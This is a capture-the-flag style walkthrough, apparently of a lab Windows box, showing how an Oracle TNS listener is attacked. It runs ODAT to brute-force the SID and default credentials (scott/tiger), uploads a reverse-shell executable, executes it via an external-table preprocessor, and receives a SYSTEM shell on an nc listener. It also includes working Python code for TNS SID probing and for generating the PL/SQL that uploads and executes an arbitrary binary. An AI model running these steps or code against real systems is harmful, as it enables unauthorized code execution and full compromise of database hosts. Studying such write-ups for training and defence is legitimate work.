80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-time:
| date: 2022-01-21T19:57:57
|_ start_date: 2022-01-21T19:45:43
| smb2-security-mode:
| 3.0.2:
|_ Message signing enabled but not required
We discovered the vulnerability of the box: the Oracle TNS listener on port 1521 is affected by TNS poisoning (CVE-2012-1675). Now we have to search for an existing exploit or tool that we can use for our case. After a while I found ODAT (Oracle Database Attacking Tool). In its README.md I found a module for our CVE-2012-1675. So let's try this tool.
First we have to clone the repo and change our directory to it:
But we need the server SID. Let's see how we can discover it.
The help menu of odat.py shows us a module called sidguesser. I think this is what we need.
$ python3 odat.py sidguesser -s 10.10.10.82
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...
100% |###########################################################################################################| Time: 00:01:30
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |###########################################################################################################| Time: 00:00:02
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue...
100% |###########################################################################################################| Time: 00:01:13
[+] SIDs found on the 10.10.10.82:1521 server: XE
And we got our SID: XE
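To see what a SID guesser actually does against the listener, here is the probe at the TNS packet level, written as an added example in Python (it is not ODAT's code). A TNS CONNECT packet names a SID; a listener that serves it answers ACCEPT (or RESEND/REDIRECT), while one that does not know it answers REFUSE carrying ORA-12505. The client version, NT characteristics and connect flag constants are assumptions taken from typical 10g/11g client traffic, and the REFUSE and ACCEPT packets at the bottom are constructed samples so the parsing can be exercised offline.

```python
import re
import socket
import struct

# TNS packet types carried in byte 4 of the 8-byte header
TNS_TYPE_CONNECT = 1
TNS_TYPE_ACCEPT = 2
TNS_TYPE_REFUSE = 4
TNS_TYPE_REDIRECT = 5
TNS_TYPE_RESEND = 11

TNS_HEADER = ">HHBBH"     # length, packet checksum, type, reserved, header checksum
CONNECT_DATA_OFFSET = 58  # 8-byte header + 50-byte CONNECT body


def build_connect_packet(host, port, sid):
    """Build a TNS CONNECT packet asking the listener for `sid`."""
    connect_data = (
        "(DESCRIPTION=(CONNECT_DATA=(SID={sid})(CID=(PROGRAM=sidprobe)"
        "(HOST=sidprobe)(USER=sidprobe)))"
        "(ADDRESS=(PROTOCOL=TCP)(HOST={host})(PORT={port})))"
    ).format(sid=sid, host=host, port=port).encode()
    body = struct.pack(
        ">HHHHHHHHHHIBBIIQQ",
        0x0139,               # client version (313)            -- assumption
        0x012C,               # lowest compatible version (300) -- assumption
        0x0000,               # service options
        0x0800,               # SDU 2048
        0x7FFF,               # TDU 32767
        0x4F98,               # NT protocol characteristics     -- assumption
        0x0000,               # max packets before ack
        0x0001,               # byte-order marker ("1 in hardware")
        len(connect_data),    # connect data length
        CONNECT_DATA_OFFSET,  # connect data offset from packet start
        0,                    # max receivable connect data
        0x41, 0x41,           # connect flags 0 and 1           -- assumption
        0, 0,                 # trace cross-facility items
        0, 0,                 # trace unique connection id, unused
    )
    assert len(body) == CONNECT_DATA_OFFSET - 8
    total = 8 + len(body) + len(connect_data)
    header = struct.pack(TNS_HEADER, total, 0, TNS_TYPE_CONNECT, 0, 0)
    return header + body + connect_data


def parse_tns_response(data):
    """Return (type_name, error_code) for a raw TNS reply from the listener."""
    if len(data) < 8:
        raise ValueError("TNS reply shorter than the 8-byte header")
    length, _cksum, ptype, _reserved, _hcksum = struct.unpack(TNS_HEADER, data[:8])
    if ptype == TNS_TYPE_REFUSE:
        # REFUSE body: user reason (1), system reason (1), data length (2), text
        text = data[12:length].decode("ascii", errors="replace")
        m = re.search(r"\((?:ERR|CODE)=(\d+)\)", text)
        return "REFUSE", (int(m.group(1)) if m else None)
    names = {TNS_TYPE_ACCEPT: "ACCEPT", TNS_TYPE_REDIRECT: "REDIRECT",
             TNS_TYPE_RESEND: "RESEND"}
    return names.get(ptype, "TYPE_%d" % ptype), None


def classify_sid(ptype, code):
    """Map a listener reply to a verdict on the probed SID."""
    if ptype in ("ACCEPT", "REDIRECT", "RESEND"):
        return "valid"
    if ptype == "REFUSE" and code in (12505, 12514):
        return "unknown"              # listener does not know this SID / service
    if ptype == "REFUSE":
        return "refused:%s" % code    # SID known, but hand-off failed (e.g. 12518, 12528)
    return "unexpected:" + ptype


def probe_sid(host, port, sid, timeout=5.0):
    """Send one CONNECT and classify the reply (live network call, not run offline)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_connect_packet(host, port, sid))
        reply = s.recv(4096)
    return classify_sid(*parse_tns_response(reply))


def constructed_refuse(text):
    """Build a REFUSE packet the way a listener sends it (constructed sample for offline use)."""
    body = struct.pack(">BBH", 0x22, 0x00, len(text)) + text.encode()
    return struct.pack(TNS_HEADER, 8 + len(body), 0, TNS_TYPE_REFUSE, 0, 0) + body


# Constructed sample of the ORA-12505 refusal returned for an unknown SID
SAMPLE_REFUSE_UNKNOWN_SID = constructed_refuse(
    "(DESCRIPTION=(TMP=)(VSNNUM=186647040)(ERR=12505)"
    "(ERROR_STACK=(ERROR=(CODE=12505)(EMFI=4))))"
)
# Constructed sample ACCEPT (body content is irrelevant to the verdict)
SAMPLE_ACCEPT = struct.pack(TNS_HEADER, 8 + 24, 0, TNS_TYPE_ACCEPT, 0, 0) + bytes(24)

if __name__ == "__main__":
    for sample in (SAMPLE_REFUSE_UNKNOWN_SID, SAMPLE_ACCEPT):
        print(classify_sid(*parse_tns_response(sample)))
    # live use against the box: probe_sid("10.10.10.82", 1521, "XE")
```

The verdict logic is the point: ODAT's wordlist and brute-force phases are just this probe in a loop, and a REFUSE with a code other than 12505/12514 (for example 12528, instance blocking new connections) still tells you the SID exists. The second TNS listener on 49159 in the nmap output reports "requires service name", so against that port the same probe would need SERVICE_NAME instead of SID.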
Now we can test the tnspoison module again, this time with the SID. I always try to verify the vulnerability before I run into a rabbit hole.
$ python3 odat.py tnspoison -s 10.10.10.82 -d XE --test-module
[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning
Yes, the target is vulnerable. In the help menu of odat.py I also saw the module passwordguesser, so maybe we can find some valid credentials. Now that we have the SID we can pass it along; almost every module requires it.
$ python3 odat.py passwordguesser -s 10.10.10.82 -d XE
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521....
[+] Accounts found on 10.10.10.82:1521/sid:XE: scott/tiger
Awesome! We found valid credentials: the default scott/tiger account. So maybe we are able to upload a reverse shell. There is a module named utlfile; with it we can upload, download and delete files on the server. But first we have to create our reverse shell executable (qwertty.exe below).
$ python3 odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --putFile c:/ qwertty.exe ../qwertty.exe
[1] (10.10.10.82:1521): Put the ../qwertty.exe local file in the c:/ folder like qwertty.exe on the 10.10.10.82 server
[+] The ../qwertty.exe file was created on the c:/ directory on the 10.10.10.82 server like the qwertty.exe file
Nice, the file was created on the box.
Now let's start our nc listener on port 4444:
$ nc -lvnp 4444
Now we can use the module externaltable. It took me a while to discover this module because its name does not give away what we were looking for. But the description says exactly what we want:
to read files or to execute system commands/scripts
Let's try it:
$ python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --exec c:/ qwertty.exe
[1] (10.10.10.82:1521): Execute the qwertty.exe command stored in the c:/ path
Hopefully we got the reverse shell. Let's check our nc listener:
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.82] 49163
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
whoami
nt authority\system

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>
Nice! We got a shell, and it runs as NT AUTHORITY\SYSTEM because the Oracle service spawned our executable. Now we can grab the user and root flag right away.
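To understand what the utlfile upload and the externaltable --exec step did on the database side, here is the underlying SQL and PL/SQL expressed as an added Python example (my own reconstruction of the technique, not ODAT's code): a directory object pointing at c:/, a binary write through UTL_FILE.PUT_RAW in RAW-sized chunks, and an external table whose PREPROCESSOR is the uploaded file, so a SELECT on it makes the Oracle service process run it. The directory and table names, the chunk size and the sample payload are assumptions and constructed data, not the real qwertty.exe.

```python
# Added example: the SQL/PL-SQL that a SYSDBA session runs to write a binary
# file and execute it via an external-table preprocessor. Names, chunk size
# and the sample payload are assumptions / constructed data.

RAW_CHUNK = 16000  # bytes per PUT_RAW call; RAW is capped at 32767 bytes -- assumed safe size


def hex_chunks(payload, chunk=RAW_CHUNK):
    """Split binary payload into uppercase hex strings that HEXTORAW() accepts."""
    if chunk <= 0 or chunk > 32767:
        raise ValueError("chunk must be between 1 and 32767 bytes")
    return [payload[i:i + chunk].hex().upper() for i in range(0, len(payload), chunk)]


def build_upload_plsql(dir_obj, dir_path, filename, payload, chunk=RAW_CHUNK):
    """Statements that create a directory object and write `payload` to dir_path/filename."""
    puts = "\n".join(
        "  UTL_FILE.PUT_RAW(f, HEXTORAW('%s'), TRUE);" % h
        for h in hex_chunks(payload, chunk)
    )
    block = (
        "DECLARE\n"
        "  f UTL_FILE.FILE_TYPE;\n"
        "BEGIN\n"
        "  f := UTL_FILE.FOPEN('%s', '%s', 'wb', 32767);\n"   # 'wb' = binary write
        "%s\n"
        "  UTL_FILE.FCLOSE(f);\n"
        "END;" % (dir_obj, filename, puts)
    )
    return [
        "CREATE OR REPLACE DIRECTORY %s AS '%s'" % (dir_obj, dir_path),
        block,
    ]


def build_exec_sql(dir_obj, filename, table="EXT_EXEC"):
    """External table whose PREPROCESSOR is the uploaded file; SELECT executes it."""
    ddl = (
        "CREATE TABLE %s (line VARCHAR2(4000))\n"
        "ORGANIZATION EXTERNAL (\n"
        "  TYPE ORACLE_LOADER\n"
        "  DEFAULT DIRECTORY %s\n"
        "  ACCESS PARAMETERS (\n"
        "    RECORDS DELIMITED BY NEWLINE\n"
        "    PREPROCESSOR %s:'%s'\n"
        "    NOBADFILE NOLOGFILE\n"
        "    FIELDS TERMINATED BY '|' MISSING FIELD VALUES ARE NULL\n"
        "  )\n"
        "  LOCATION ('%s')\n"
        ")" % (table, dir_obj, dir_obj, filename, filename)
    )
    # The SELECT forks the preprocessor; its stdout is what the table returns.
    return [ddl, "SELECT * FROM %s" % table, "DROP TABLE %s" % table]


def full_sequence(dir_obj, dir_path, filename, payload, chunk=RAW_CHUNK):
    """Upload, execute and clean up, in the order a client would submit them."""
    return (
        build_upload_plsql(dir_obj, dir_path, filename, payload, chunk)
        + build_exec_sql(dir_obj, filename)
        + ["DROP DIRECTORY %s" % dir_obj]
    )


if __name__ == "__main__":
    # Constructed stand-in for the reverse-shell binary: 25,600 arbitrary bytes
    sample_payload = bytes(range(256)) * 100
    for stmt in full_sequence("PAYLOAD_DIR", "c:/", "qwertty.exe", sample_payload, 10000):
        print(stmt[:120] + ("..." if len(stmt) > 120 else ""))
        print("/")
```

Two practical points follow from this. First, creating the directory object and executing a preprocessor need CREATE ANY DIRECTORY and execute rights on the directory, which scott does not have on his own; that is why the ODAT calls above pass --sysdba and why the lowly scott/tiger pair still ends in a SYSTEM shell. Second, the SELECT does not return until the preprocessor exits, so while the reverse shell is alive the externaltable command keeps hanging, which matches the missing "[+]" line in its output above.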